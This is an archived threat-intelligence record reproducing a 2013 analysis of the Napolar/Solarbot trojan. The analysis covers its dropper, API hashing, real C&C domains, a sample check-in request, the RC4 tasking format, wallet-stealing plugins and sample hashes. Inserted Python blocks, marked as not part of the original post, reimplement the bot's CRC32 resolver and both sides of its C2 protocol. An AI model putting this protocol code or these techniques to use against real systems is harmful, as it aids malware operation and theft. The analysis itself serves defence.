{
	"id": "190727a8-e53e-4e0e-8b8b-26c5958667d4",
	"created_at": "2026-04-10T03:20:58.219609Z",
	"updated_at": "2026-04-10T03:22:18.978114Z",
	"deleted_at": null,
	"sha1_hash": "a215df1efbdb45459fea1fe4387a5afdf9709f70",
	"title": "Win32/64:Napolar: New Trojan shines on the cyber crime-scene",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 982332,
	"plain_text": "Win32/64:Napolar: New Trojan shines on the cyber crime-scene\r\nBy Threat Intelligence Team 25 Sep 2013\r\nArchived: 2026-04-10 02:22:00 UTC\r\nIn recent weeks, malware samples detected as Win32/64:Napolar (the name comes from AVAST's name pools) generated a lot of hits within our file and network shields. Independently, we observed an advertising campaign for a new Trojan dubbed Solarbot that started around May 2013. This campaign did not run through the shady hacking forums we are used to, but instead through a website indexed by the main search engines. The website is called http://solarbot.net and presents its offer with a professional-looking design (screenshot not reproduced here).\r\nIn the Win32/64:Napolar Trojan, the pipe used for inter-process communication is named \\\\.\\pipe\\napSolar. Together with the presence of character strings like \"CHROME.DLL,\" \"OPERA.DLL,\" \"trusteer,\" \"data_inject,\" and features we'll mention later, we have almost no doubt that the Trojan and Solarbot are one and the same. Let us look at some analysis.\r\nDropper\r\nThe initial binary comes in the form of an SFX archive named in a fashion similar to Photo_021-WWW.FACEBOOK.COM.exe. It handles two events: a silent execution of the Trojan's dropper and the display of a distracting image of girls (screenshot not reproduced here).\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 1 of 7\n\nAccording to the author's statement, Solarbot was written in the Lazarus IDE for Free Pascal. We cannot recall any professional or commercial Trojan that shares this property. 
On the other hand, we cannot confirm that the analyzed binary is written in Free Pascal, because a lot of information in the PE header differs from the usual binaries compiled by Free Pascal.\r\nThe structure of the core executable is as follows (diagram not reproduced here):\r\nThe initial x86 part also detects the system's architecture. On a 64-bit system, the corresponding 64-bit module is extracted and loaded. LDE64 (Length Disassembler Engine) is a publicly available 32-bit engine based on BeaEngine that computes the length of instructions for both 32-bit and 64-bit x86 code. A length disassembler is needed for precise modification of system functions: an inline hook overwrites the first bytes of a function with a jump to a custom routine, so the bot must know exactly where the overwritten instructions end in order to relocate them intact to a trampoline (or to emulate that chunk of the original code) before handing control back.\r\nAs described on the advertising page, all important WINAPI functions from KERNEL32.DLL, NTDLL.DLL, WININET.DLL, WS2_32.DLL, SHLWAPI.DLL and PSAPI.DLL are resolved by the CRC32 hash of their names rather than through a plain-text import table (the constant table of the CRC32 algorithm is found at address 0xFF395A), and the resolved addresses are stored in a virtual table. A few anti-debugging tricks related to the IsDebuggerPresent and OutputDebugString functions were also observed. After installation into %AppData%\\lsass.exe, the bot starts its instance from newly allocated memory at virtual address 0xFE0000 and terminates the original process, so it cannot be identified in the list of running processes. (The legitimate lsass.exe lives in %SystemRoot%\\System32; a copy under %AppData% is itself a strong indicator of this infection.)\r\nTo estimate the spread of this infection, we analyzed a subset of the related detections. 
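The CRC32-based API resolution described above, as an added example that is not part of the original post or of the bot's code: it rebuilds the CRC32 constant table a sample embeds (so an analyst can compare it with the bytes at 0xFF395A), hashes export names the way a resolver stub does, and builds the inverse hash-to-name lookup needed to annotate the bot's virtual table. The polynomial (standard reflected CRC-32, as in zlib) and the sample export lists are assumptions; the post does not say which CRC32 variant is used or whether names are case-folded.

```python
# Added example (not code from the AVAST post or from the Solarbot/Napolar
# author): resolving Windows API names by CRC32 hash, the technique the post
# describes, and the analyst-side inverse lookup that undoes it.
# Assumptions (labelled): the standard reflected CRC-32 (polynomial 0xEDB88320,
# the table zlib uses) over the raw ASCII export name; the post does not state
# the polynomial or whether names are case-folded. The export list below is a
# constructed sample, not a real export table.
import zlib

CRC32_POLY = 0xEDB88320  # reflected form of 0x04C11DB7


def crc32_table():
    # Rebuild the 256-entry constant table a CRC32-hashing sample embeds; an
    # analyst can compare it with the bytes at the address found in the binary
    # (0xFF395A in the analysed Napolar core) to confirm the variant in use.
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ CRC32_POLY if c & 1 else c >> 1
        table.append(c)
    return table


def crc32_from_table(data, table):
    # Table-driven CRC-32 exactly as a small resolver stub in malware does it.
    crc = 0xFFFFFFFF
    for b in data:
        crc = table[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def api_hash(name):
    # The 32-bit value a sample stores instead of the import name.
    return zlib.crc32(name.encode('ascii')) & 0xFFFFFFFF


# Constructed sample export tables (a handful of real export names per DLL,
# not the full tables) standing in for the loaded modules.
SAMPLE_EXPORTS = {
    'KERNEL32.DLL': ['CreateFileA', 'VirtualAlloc', 'GetProcAddress',
                     'IsDebuggerPresent', 'OutputDebugStringA'],
    'NTDLL.DLL': ['NtQueryInformationProcess', 'RtlDecompressBuffer'],
    'WININET.DLL': ['InternetOpenA', 'HttpSendRequestA'],
    'WS2_32.DLL': ['WSAStartup', 'connect', 'send', 'recv'],
}


def resolve_by_hash(wanted_hash, exports):
    # Malware-side resolution: walk the export names of each module and
    # return the first whose CRC32 matches. Returns (module, name) or None.
    for module, names in exports.items():
        for name in names:
            if api_hash(name) == wanted_hash:
                return module, name
    return None


def build_hash_lookup(exports):
    # Analyst-side inverse: precompute hash -> (module, name) for every known
    # export so a virtual table full of hashes can be annotated in one pass.
    return {api_hash(n): (m, n) for m, names in exports.items() for n in names}


def annotate_vtable(hashes, lookup):
    # Map each 32-bit hash in the bot's virtual table back to an API name;
    # unknown hashes are kept as hex so they are not silently dropped.
    return [lookup.get(h, ('?', hex(h))) for h in hashes]


if __name__ == '__main__':
    table = crc32_table()
    print(hex(table[1]))  # 0x77073096 in the standard table
    lookup = build_hash_lookup(SAMPLE_EXPORTS)
    vtable = [api_hash('VirtualAlloc'), api_hash('HttpSendRequestA'), 0xDEADBEEF]
    for entry in annotate_vtable(vtable, lookup):
        print(entry)
```

If the table at 0xFF395A starts 0x00000000, 0x77073096, 0xEE0E612C it is the standard CRC-32 table and this lookup applies unchanged; a different second entry means a custom polynomial and the table must be lifted from the sample instead of regenerated.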
The incidence reaches at least several hundred unique computers a day, and it could be somewhat more across all Solarbot samples. The places most affected are the South and Central American countries of Colombia, Venezuela, Peru, Mexico and Argentina; the Asian countries of the Philippines and Vietnam; and Poland in Europe (map not reproduced here).\r\nCommunication protocol\r\nA few gate URLs (C\u0026C servers) have been identified so far: xyz25.com, cmeef.info and paloshke.org. The latter is registered through the infamous Bizcn.com, Inc. We have blogged about fake repair tools with domains registered with this fraudulent Chinese registrar in the past. The advertising site solarbot.net is registered with the following info:\r\nDomain Name: SOLARBOT.NET\r\nRegistrar: NETEARTH ONE INC. D/B/A NETEARTH\r\nWhois Server: whois.advancedregistrar.com\r\nReferral URL: http://www.advancedregistrar.com\r\nName Server: NS1.BITCOIN-DNS.COM\r\nName Server: NS2.BITCOIN-DNS.COM\r\nStatus: clientTransferProhibited\r\nUpdated Date: 01-aug-2013\r\nCreation Date: 01-aug-2013\r\nExpiration Date: 01-aug-2014\r\nThe registrant's contact data are hidden behind PRIVACYPROTECT.ORG, a WHOIS privacy service that attracts various groups involved in malicious activities.\r\nAn initial HTTP POST request for fetching a command to be executed looks like this:\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nHost: www.paloshke.org\r\nContent-Length: 81\r\nPragma: no-cache\r\n\r\nv=1.0\u0026u=USER_NAME\u0026c=COMP_NAME\u0026s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}\u0026w=2.5.1\u0026b=32\r\nwhere s 
is the key for the subsequent RC4 decryption, generated from the victim's environment, and v is the bot's protocol version (u and c carry the user and computer names, replaced by placeholders above; w and b are not described in the post, but b=32 plausibly marks a 32-bit host and w may encode the Windows version, consistent with the Windows NT 5.1 user agent). The number 1.0 suggests that we are facing the initial development stage of this bot.\r\nAfter a successful request, a response follows. As mentioned, it is encrypted with RC4, and the key is sent unencrypted in the POST body, so anyone holding a capture of the session can decrypt the tasking. The plain response takes the form of an array of strings separated by a zero byte. Every string starts with a byte identifying a command number (a total of 15 different switch cases were observed) followed by the corresponding plain-text argument. For a connection delay (command 0xC) it is the count of seconds (usually 3600 in our observations); for a download (command 0x12) it is the URL of a file followed by a control hash and a decryption key; command 0x2 installs additional binaries, e.g. the download of the Bitcoin wallet stealing plugin called WalletSteal.bin. By the definition from bitcoin.org, a Bitcoin wallet is the equivalent of a physical wallet on the Bitcoin network: it contains the private keys that allow a user to spend the Bitcoins allocated to it in the public record of Bitcoin transactions. This is an example of the promised plugin support. The plugin is stored encrypted in the temporary directory SlrPlugin under %AppData%.\r\nFeatures\r\nThe following list of features is presented officially on the website (screenshot not reproduced here):\r\nWe have seen implemented functionalities like an FTP and POP3 grabber, a reverse SOCKS5 proxy, and the basis of functional modularity. There were relevant strings (\"SSL\", \"http://\", \"http://\", names of web browser libraries, \"NSS layer\", \"data_start\", \"data_inject\", \"data_end\") indicating the possibility of man-in-the-browser attacks. 
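The check-in and tasking exchange described above, carried out by both sides offline as an added example (not code from the original post or from the bot's author): the bot builds the POST body with the parameters seen on the wire, the C2 side reads the RC4 key s back out of that body, encrypts a zero-separated tasking array, and the bot (or an analyst holding a packet capture) decrypts and parses it. Using s directly as the RC4 key bytes, treating the command number as a raw first byte, and the pipe-separated layout of the 0x12 download argument are assumptions; the sample tasking is constructed.

```python
# Added example (not code from the AVAST post or from the Solarbot/Napolar
# author): the check-in and tasking exchange the post describes, carried out
# by both sides offline. Assumptions (labelled): the s value is used directly
# as the RC4 key bytes (the post says only that it is generated from the
# victim's environment); the command number is the raw first byte of each
# zero-separated string; the 0x12 argument is laid out as url|hash|key;
# command meanings are the ones the post lists (0xC delay in seconds,
# 0x12 download, 0x2 plugin install, 0xF URL list). The tasking below is
# constructed sample data.
from urllib.parse import urlencode, parse_qs

CMD_PLUGIN = 0x02
CMD_DELAY = 0x0C
CMD_URL_LIST = 0x0F
CMD_DOWNLOAD = 0x12
SEP = bytes([0])


def build_checkin(user, computer, session_key, win_ver='2.5.1', bits=32, version='1.0'):
    # Bot side: the form body of the initial POST. Parameter names v, u, c, s,
    # w, b are those seen on the wire; braces are left unencoded as observed.
    fields = [('v', version), ('u', user), ('c', computer),
              ('s', session_key), ('w', win_ver), ('b', bits)]
    return urlencode(fields, safe='{}').encode('ascii')


def key_from_checkin(body):
    # C2 side (or analyst with a capture): the RC4 key travels in the clear
    # in the POST body, so it is read straight back out of the request.
    return parse_qs(body.decode('ascii'))['s'][0].encode('ascii')


def rc4(key, data):
    # Textbook RC4 (KSA + PRGA); encryption and decryption are the same op.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_tasking(commands):
    # C2 side: each command is one byte of command number followed by its
    # plain-text argument; commands are joined with a zero byte.
    return SEP.join(bytes([cmd]) + arg.encode('ascii') for cmd, arg in commands)


def parse_tasking(plain):
    # Bot side / analyst side: split on the zero separator and peel off the
    # leading command byte. Empty chunks (trailing separator) are skipped.
    commands = []
    for chunk in plain.split(SEP):
        if chunk:
            commands.append((chunk[0], chunk[1:].decode('ascii')))
    return commands


def decrypt_response(body, encrypted):
    # Full analyst path from a captured request body and response payload.
    return parse_tasking(rc4(key_from_checkin(body), encrypted))


def describe(cmd, arg):
    # Turn a parsed command into something a human or a detection rule can use.
    if cmd == CMD_DELAY:
        return 'sleep %d seconds' % int(arg)
    if cmd == CMD_DOWNLOAD:
        url, control_hash, key = arg.split('|')   # field layout is an assumption
        return 'download %s (hash %s, key %s)' % (url, control_hash, key)
    if cmd == CMD_PLUGIN:
        return 'install plugin %s' % arg
    if cmd == CMD_URL_LIST:
        return 'update URL list: %s' % arg
    return 'unknown command 0x%02x: %r' % (cmd, arg)


if __name__ == '__main__':
    body = build_checkin('USER_NAME', 'COMP_NAME', '{7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}')
    # Constructed sample tasking that a C2 might send back.
    tasking = [
        (CMD_DELAY, '3600'),
        (CMD_PLUGIN, 'WalletSteal.bin'),
        (CMD_DOWNLOAD, 'http://www.paloshke.org/m.bin|0123456789abcdef|k1'),
    ]
    wire = rc4(key_from_checkin(body), encode_tasking(tasking))
    for cmd, arg in decrypt_response(body, wire):
        print(describe(cmd, arg))
```

The point of key_from_checkin is the weakness the post notes: because s is sent in the clear, a proxy log or pcap of the request is all that is needed to recover the plaintext tasking from the response, no memory dump required.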
Indeed, we observed that the contents of forms on internet banking sites were sent to the C\u0026C in unencrypted form, but only when the site triggered a reputation or certificate check. This may be connected with an internal list of URLs, mostly reputation and certificate-revocation endpoints (http://urs.microsoft.com/urs.asmx, the Microsoft URL reputation service used by SmartScreen; the OCSP responders http://ocsp.verisign.com and http://ocsp.comodoca.com; http://safebrowsing.clients.google.com; http://dirpop.naver.com:8088/search.naver), which is updated remotely with the internal command 0xF.\r\nNext, dynamically, we saw the download of a Bitcoin miner that was afterwards injected into a copy of the standard Windows notepad binary in the system's %Temp% directory and executed (this corresponds to the item \"MD5 Verified Update and Download System\" in the list).\r\nIn the end, we have to say that this bot displays solid malicious performance. Together with the reasonable price of $200, it could be on the rise in the near future. Fortunately, the antivirus industry will react to make the lives of these cyber-criminals harder.\r\nSources\r\nSHA256 hashes of some selected samples and how they are covered by the AVAST engine:\r\nDropper 1: 1f11b896cc641db605d70186be468a148a64ea233a21d353e7483239e71e1516 (Win32:Napolar-E [Cryp])\r\nDropper 2: f1a5707963a7e33a925111f09209a92b03732fa9292697b37e528ad941076a8d (Win32:Napolar-E [Cryp])\r\nNapolar Core Binary: 463d39dcbf19b5c4c9e314e5ce77bf8a51848b8c7d64e4f0a6656b9d28941e2e (Win32:Napolar-D [Trj])\r\nWalletSteal Plugin Download: 12ca161cd72873477906100f083e43dca936312ba44b691f5046f53b09e3b4f7 (JS:NapolarPlugin-A [Trj])\r\nWalletSteal Plugin x86: bb49fa791915bf49ceb2a0563c91d2acaed6249438f349c6e75094f3924de64d (Win32:NapolarPlugin-B [Trj])\r\nWalletSteal Plugin x64: ff92206215115c867789dbd5a95132a2bd153bb1e5a1ef66e539f382f2ce30dc (Win32:NapolarPlugin-B [Trj])\r\nSource: 
https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/"
	],
	"report_names": [
		"win3264napolar-new-trojan-shines-on-the-cyber-crime-scene"
	],
	"threat_actors": [],
	"ts_created_at": 1775791258,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a215df1efbdb45459fea1fe4387a5afdf9709f70.pdf",
		"text": "https://archive.orkl.eu/a215df1efbdb45459fea1fe4387a5afdf9709f70.txt",
		"img": "https://archive.orkl.eu/a215df1efbdb45459fea1fe4387a5afdf9709f70.jpg"
	}
}